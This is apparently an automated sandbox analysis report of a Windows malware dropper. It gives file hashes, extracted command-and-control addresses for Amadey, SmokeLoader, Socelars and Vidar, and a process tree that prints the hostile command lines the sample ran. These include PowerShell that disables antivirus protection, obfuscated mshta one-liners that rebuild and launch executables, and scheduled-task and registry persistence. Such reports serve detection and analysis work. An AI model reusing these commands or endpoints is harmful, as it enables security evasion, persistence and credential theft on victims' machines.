Analysis

  • max time kernel
    66s
  • max time network
    5336s
  • platform
    windows7_x64
  • resource
    win7-de-20211014
  • submitted
    14-11-2021 09:04

General

  • Target

    setup_x86_x64_install.exe

  • Size

    8.4MB

  • MD5

    dc3279eab20f1e9cff2a573c1f9ef8ee

  • SHA1

    049e214cd7dc62c2d409c8cc060dcd9bcc6dcfc2

  • SHA256

    edceb274c572ba560f1f27c5d97991b9b56a2bce8daf617f2b4c9bbbe5008db4

  • SHA512

    eaa28ef57863778175b0efc8075b7ad2909ef4d90efdc144db318d414e64ed5e0334c8fef656bd3286e05102676b780f7b754e23cf75f15797faa62fcf69fb3a

Malware Config

Extracted

Family

amadey

Version

2.82

C2

185.215.113.45/g4MbvE/index.php

Extracted

Family

socelars

C2

http://www.hhgenice.top/

Extracted

Family

vidar

Version

48.3

Botnet

933

Attributes
  • profile_id

    933

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

C2

http://membro.at/upload/

http://jeevanpunetha.com/upload/

http://misipu.cn/upload/

http://zavodooo.ru/upload/

http://targiko.ru/upload/

http://vues3d.com/upload/

rc4.i32
rc4.i32

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 1 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Downloads MZ/PE file
  • Executes dropped EXE 16 IoCs
  • Loads dropped DLL 57 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Looks up geolocation information via web service

    Uses a legitimate geolocation service to find the infected system's geolocation info.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 3 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 36 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
    "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:968
    • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:924
      • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\setup_install.exe
        "C:\Users\Admin\AppData\Local\Temp\7zSC930E916\setup_install.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:1568
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          4⤵
            PID:1672
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
              5⤵
                PID:1644
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              4⤵
                PID:1856
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                  5⤵
                    PID:1216
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c Sun07f05cf99e017109.exe
                  4⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:820
                  • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07f05cf99e017109.exe
                    Sun07f05cf99e017109.exe
                    5⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    PID:1156
                    • C:\Users\Admin\Pictures\Adobe Films\Cs6SVEBFG0pnpAtS0Svqd3zH.exe
                      "C:\Users\Admin\Pictures\Adobe Films\Cs6SVEBFG0pnpAtS0Svqd3zH.exe"
                      6⤵
                        PID:3056
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 1156 -s 1472
                        6⤵
                        • Program crash
                        PID:668
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Sun07923b89b57.exe
                    4⤵
                    • Loads dropped DLL
                    PID:1800
                    • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07923b89b57.exe
                      Sun07923b89b57.exe
                      5⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1668
                      • C:\Users\Admin\AppData\Roaming\8941195.exe
                        "C:\Users\Admin\AppData\Roaming\8941195.exe"
                        6⤵
                          PID:2560
                        • C:\Users\Admin\AppData\Roaming\6097009.exe
                          "C:\Users\Admin\AppData\Roaming\6097009.exe"
                          6⤵
                            PID:2588
                            • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                              "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                              7⤵
                                PID:2792
                            • C:\Users\Admin\AppData\Roaming\7711949.exe
                              "C:\Users\Admin\AppData\Roaming\7711949.exe"
                              6⤵
                                PID:2696
                              • C:\Users\Admin\AppData\Roaming\6092579.exe
                                "C:\Users\Admin\AppData\Roaming\6092579.exe"
                                6⤵
                                  PID:2728
                                • C:\Users\Admin\AppData\Roaming\2345679.exe
                                  "C:\Users\Admin\AppData\Roaming\2345679.exe"
                                  6⤵
                                    PID:2764
                                  • C:\Users\Admin\AppData\Roaming\1637676.exe
                                    "C:\Users\Admin\AppData\Roaming\1637676.exe"
                                    6⤵
                                      PID:2932
                                      • C:\Windows\SysWOW64\mshta.exe
                                        "C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\1637676.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """" == """" for %v In (""C:\Users\Admin\AppData\Roaming\1637676.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )
                                        7⤵
                                          PID:3008
                                          • C:\Windows\SysWOW64\cmd.exe
                                            "C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\1637676.exe" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if "" == "" for %v In ("C:\Users\Admin\AppData\Roaming\1637676.exe" ) do taskkill -F -IM "%~Nxv"
                                            8⤵
                                              PID:1420
                                              • C:\Windows\SysWOW64\taskkill.exe
                                                taskkill -F -IM "1637676.exe"
                                                9⤵
                                                • Kills process with taskkill
                                                PID:1072
                                              • C:\Users\Admin\AppData\Local\Temp\Qw5u.exe
                                                Qw5U.Exe -PmowtdFUhhnCoUk
                                                9⤵
                                                  PID:2596
                                                  • C:\Windows\SysWOW64\mshta.exe
                                                    "C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if ""-PmowtdFUhhnCoUk "" == """" for %v In (""C:\Users\Admin\AppData\Local\Temp\Qw5u.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )
                                                    10⤵
                                                      PID:2880
                                            • C:\Users\Admin\AppData\Roaming\8224331.exe
                                              "C:\Users\Admin\AppData\Roaming\8224331.exe"
                                              6⤵
                                                PID:2956
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Sun0768bf0e01cf08ac5.exe
                                            4⤵
                                            • Loads dropped DLL
                                            PID:1784
                                            • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exe
                                              Sun0768bf0e01cf08ac5.exe
                                              5⤵
                                              • Executes dropped EXE
                                              • Loads dropped DLL
                                              PID:828
                                              • C:\Windows\SysWOW64\mshta.exe
                                                "C:\Windows\System32\mshta.exe" vbScript: Close ( CreAtEoBJeCT( "WScrIpt.SHelL" ).RUn ( "cmd /q/c Type ""C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exe"" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If """" == """" for %t in ( ""C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exe"" ) do taskkill -im ""%~NXt"" -f " , 0 , tRuE ) )
                                                6⤵
                                                  PID:336
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /q/c Type "C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exe" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If "" == "" for %t in ( "C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0768bf0e01cf08ac5.exe" ) do taskkill -im "%~NXt" -f
                                                    7⤵
                                                      PID:3036
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill -im "Sun0768bf0e01cf08ac5.exe" -f
                                                        8⤵
                                                        • Kills process with taskkill
                                                        PID:2104
                                                      • C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe
                                                        ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi
                                                        8⤵
                                                          PID:1776
                                                          • C:\Windows\SysWOW64\mshta.exe
                                                            "C:\Windows\System32\mshta.exe" vbScript: Close ( CreAtEoBJeCT( "WScrIpt.SHelL" ).RUn ( "cmd /q/c Type ""C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe"" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If ""-PhymCZvLUAWi "" == """" for %t in ( ""C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe"" ) do taskkill -im ""%~NXt"" -f " , 0 , tRuE ) )
                                                            9⤵
                                                              PID:2068
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /q/c Type "C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe" > ..\8S~LNTCBHnm.exe &&StART ..\8S~LNTCBHnM.EXe -PhymCZvLUAWi & If "-PhymCZvLUAWi " == "" for %t in ( "C:\Users\Admin\AppData\Local\Temp\8S~LNTCBHnm.exe" ) do taskkill -im "%~NXt" -f
                                                                10⤵
                                                                  PID:2680
                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                "C:\Windows\System32\mshta.exe" VbSCRipt: cloSe ( CREaTeObJecT ( "WscrIPT.sHELL" ). RUN ("Cmd /c eCho OoC:\Users\Admin\AppData\Roaming> R2KSNNo3.CF & ecHo | sET /P = ""MZ"" > cxQOi7.xVE&cOPy /y /b CxQOI7.xVE + W4C1VWe.8 + CJkGE7GA.1lH + a5XHIxJL.To + eXTOkHQB.3J + nXVlD.YJ + _oFmVg1.L + R2KSNNO3.CF ..\TSIz8.~& Start control ..\TSiZ8.~ & DeL /Q * " ,0 ,true ) )
                                                                9⤵
                                                                  PID:2296
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /c eCho OoC:\Users\Admin\AppData\Roaming> R2KSNNo3.CF & ecHo | sET /P = "MZ" >cxQOi7.xVE&cOPy /y /b CxQOI7.xVE + W4C1VWe.8 + CJkGE7GA.1lH + a5XHIxJL.To+ eXTOkHQB.3J + nXVlD.YJ + _oFmVg1.L + R2KSNNO3.CF ..\TSIz8.~& Start control ..\TSiZ8.~ & DeL /Q *
                                                                    10⤵
                                                                      PID:1664
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c Sun07bb82f51727fc79.exe
                                                          4⤵
                                                            PID:1640
                                                            • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07bb82f51727fc79.exe
                                                              Sun07bb82f51727fc79.exe
                                                              5⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              PID:1108
                                                              • C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe"
                                                                6⤵
                                                                • Executes dropped EXE
                                                                • Loads dropped DLL
                                                                PID:1628
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  "C:\Windows\System32\cmd.exe" /C REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
                                                                  7⤵
                                                                    PID:1776
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\2303a34fa8\
                                                                      8⤵
                                                                        PID:1624
                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN tkools.exe /TR "C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe" /F
                                                                      7⤵
                                                                      • Loads dropped DLL
                                                                      • Creates scheduled task(s)
                                                                      PID:1640
                                                                    • C:\Users\Admin\AppData\Local\Temp\soul3ss_crypted\soul3ss_crypted.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\soul3ss_crypted.\soul3ss_crypted.exe"
                                                                      7⤵
                                                                      • Executes dropped EXE
                                                                      • Loads dropped DLL
                                                                      PID:2372
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 980
                                                                      7⤵
                                                                      • Program crash
                                                                      PID:2568
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Sun0746b3c4631.exe
                                                                4⤵
                                                                • Loads dropped DLL
                                                                PID:1548
                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun0746b3c4631.exe
                                                                  Sun0746b3c4631.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:1388
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c Sun07610e6b216b74271.exe
                                                                4⤵
                                                                • Loads dropped DLL
                                                                PID:1140
                                                                • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exe
                                                                  Sun07610e6b216b74271.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • Loads dropped DLL
                                                                  PID:1756
                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exe
                                                                    6⤵
                                                                      PID:1616
                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exe
                                                                      C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07610e6b216b74271.exe
                                                                      6⤵
                                                                        PID:2172
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c Sun07e5c589dd5d.exe
                                                                    4⤵
                                                                      PID:944
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c Sun075d5a7849d7670a.exe
                                                                      4⤵
                                                                        PID:1932
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        C:\Windows\system32\cmd.exe /c Sun07e840e6fb5.exe
                                                                        4⤵
                                                                          PID:964
                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exe
                                                                            Sun07e840e6fb5.exe
                                                                            5⤵
                                                                              PID:2652
                                                                              • C:\Users\Admin\AppData\Local\Temp\is-04G54.tmp\Sun07e840e6fb5.tmp
                                                                                "C:\Users\Admin\AppData\Local\Temp\is-04G54.tmp\Sun07e840e6fb5.tmp" /SL5="$2023A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exe"
                                                                                6⤵
                                                                                  PID:1492
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exe" /SILENT
                                                                                    7⤵
                                                                                      PID:2556
                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-ODOC7.tmp\Sun07e840e6fb5.tmp
                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-ODOC7.tmp\Sun07e840e6fb5.tmp" /SL5="$50238,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07e840e6fb5.exe" /SILENT
                                                                                        8⤵
                                                                                          PID:1056
                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-2OAV4.tmp\postback.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-2OAV4.tmp\postback.exe" ss1
                                                                                            9⤵
                                                                                              PID:2660
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /c Sun073980a935.exe
                                                                                    4⤵
                                                                                    • Loads dropped DLL
                                                                                    PID:2036
                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun073980a935.exe
                                                                                      Sun073980a935.exe
                                                                                      5⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      PID:1736
                                                                                      • C:\Users\Admin\Pictures\Adobe Films\MZexYDOrOLntoqOqfj6o77iI.exe
                                                                                        "C:\Users\Admin\Pictures\Adobe Films\MZexYDOrOLntoqOqfj6o77iI.exe"
                                                                                        6⤵
                                                                                          PID:2356
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      C:\Windows\system32\cmd.exe /c Sun07d46efb4bd1.exe
                                                                                      4⤵
                                                                                      • Loads dropped DLL
                                                                                      PID:744
                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07d46efb4bd1.exe
                                                                                        Sun07d46efb4bd1.exe
                                                                                        5⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Modifies system certificate store
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:976
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd.exe /c taskkill /f /im chrome.exe
                                                                                          6⤵
                                                                                            PID:2348
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /f /im chrome.exe
                                                                                              7⤵
                                                                                              • Kills process with taskkill
                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                              PID:2392
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /c Sun078a90701e.exe
                                                                                        4⤵
                                                                                        • Loads dropped DLL
                                                                                        PID:812
                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun078a90701e.exe
                                                                                          Sun078a90701e.exe
                                                                                          5⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:360
                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                            6⤵
                                                                                              PID:1332
                                                                                              • C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\SoftwareInstaller2191.exe"
                                                                                                7⤵
                                                                                                  PID:2100
                                                                                                  • C:\Users\Admin\AppData\Roaming\6267732.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\6267732.exe"
                                                                                                    8⤵
                                                                                                      PID:2176
                                                                                                    • C:\Users\Admin\AppData\Roaming\5678468.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\5678468.exe"
                                                                                                      8⤵
                                                                                                        PID:2316
                                                                                                      • C:\Users\Admin\AppData\Roaming\8255491.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\8255491.exe"
                                                                                                        8⤵
                                                                                                          PID:2672
                                                                                                        • C:\Users\Admin\AppData\Roaming\2223985.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\2223985.exe"
                                                                                                          8⤵
                                                                                                            PID:1348
                                                                                                          • C:\Users\Admin\AppData\Roaming\4525193.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\4525193.exe"
                                                                                                            8⤵
                                                                                                              PID:2688
                                                                                                            • C:\Users\Admin\AppData\Roaming\2503320.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\2503320.exe"
                                                                                                              8⤵
                                                                                                                PID:2820
                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                  "C:\Windows\System32\mshta.exe" vbSCRiPT: cLose ( creaTeobJEcT ("wSCript.ShELL").RuN ( "C:\Windows\system32\cmd.exe /Q/C typE ""C:\Users\Admin\AppData\Roaming\2503320.exe"" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if """" == """" for %v In (""C:\Users\Admin\AppData\Roaming\2503320.exe"" ) do taskkill -F -IM ""%~Nxv"" " , 0 , trUe ) )
                                                                                                                  9⤵
                                                                                                                    PID:188
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      "C:\Windows\system32\cmd.exe" /Q/C typE "C:\Users\Admin\AppData\Roaming\2503320.exe" > Qw5u.exe && stARt Qw5U.Exe -PmowtdFUhhnCoUk &if "" == "" for %v In ("C:\Users\Admin\AppData\Roaming\2503320.exe" ) do taskkill -F -IM "%~Nxv"
                                                                                                                      10⤵
                                                                                                                        PID:2740
                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                          taskkill -F -IM "2503320.exe"
                                                                                                                          11⤵
                                                                                                                          • Kills process with taskkill
                                                                                                                          PID:1808
                                                                                                                  • C:\Users\Admin\AppData\Roaming\8306000.exe
                                                                                                                    "C:\Users\Admin\AppData\Roaming\8306000.exe"
                                                                                                                    8⤵
                                                                                                                      PID:2600
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe
                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Worldoffer.exe"
                                                                                                                    7⤵
                                                                                                                      PID:2964
                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2964 -s 1424
                                                                                                                        8⤵
                                                                                                                        • Program crash
                                                                                                                        PID:1400
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                      7⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Loads dropped DLL
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:1768
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\chrome.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
                                                                                                                      7⤵
                                                                                                                        PID:2440
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\chrome update.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\chrome update.exe"
                                                                                                                        7⤵
                                                                                                                          PID:740
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\chrome1.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\chrome1.exe"
                                                                                                                          7⤵
                                                                                                                            PID:792
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                              8⤵
                                                                                                                                PID:1824
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                  9⤵
                                                                                                                                    PID:460
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                7⤵
                                                                                                                                  PID:640
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit
                                                                                                                                    8⤵
                                                                                                                                      PID:2752
                                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                        taskkill /im "setup.exe" /f
                                                                                                                                        9⤵
                                                                                                                                        • Kills process with taskkill
                                                                                                                                        PID:1976
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                    7⤵
                                                                                                                                      PID:2396
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\xuwei-game.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\xuwei-game.exe"
                                                                                                                                      7⤵
                                                                                                                                        PID:2944
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                                                                                                        7⤵
                                                                                                                                          PID:2368
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\chrome3.exe
                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
                                                                                                                                          7⤵
                                                                                                                                            PID:2676
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:1348
                                                                                                                                              • C:\Windows\System32\conhost.exe
                                                                                                                                                "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                8⤵
                                                                                                                                                  PID:1904
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c Sun07d7bdaf7c.exe
                                                                                                                                          4⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:1288
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07d7bdaf7c.exe
                                                                                                                                            Sun07d7bdaf7c.exe
                                                                                                                                            5⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:1796
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c Sun07a9799f68e7.exe /mixtwo
                                                                                                                                          4⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          PID:2024
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07a9799f68e7.exe
                                                                                                                                            Sun07a9799f68e7.exe /mixtwo
                                                                                                                                            5⤵
                                                                                                                                              PID:1768
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zSC930E916\Sun07a9799f68e7.exe
                                                                                                                                      Sun07a9799f68e7.exe /mixtwo
                                                                                                                                      1⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1236
                                                                                                                                    • C:\Windows\system32\taskeng.exe
                                                                                                                                      taskeng.exe {BD38F809-82F9-409F-BD22-F66753B9433D} S-1-5-21-2955169046-2371869340-1800780948-1000:UKNHJUQT\Admin:Interactive:[1]
                                                                                                                                      1⤵
                                                                                                                                        PID:2576
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\2303a34fa8\tkools.exe
                                                                                                                                          2⤵
                                                                                                                                            PID:2192
                                                                                                                                          • C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                                                                                                                                            "C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task
                                                                                                                                            2⤵
                                                                                                                                              PID:2176
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\viteejj
                                                                                                                                              C:\Users\Admin\AppData\Roaming\viteejj
                                                                                                                                              2⤵
                                                                                                                                                PID:2940
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
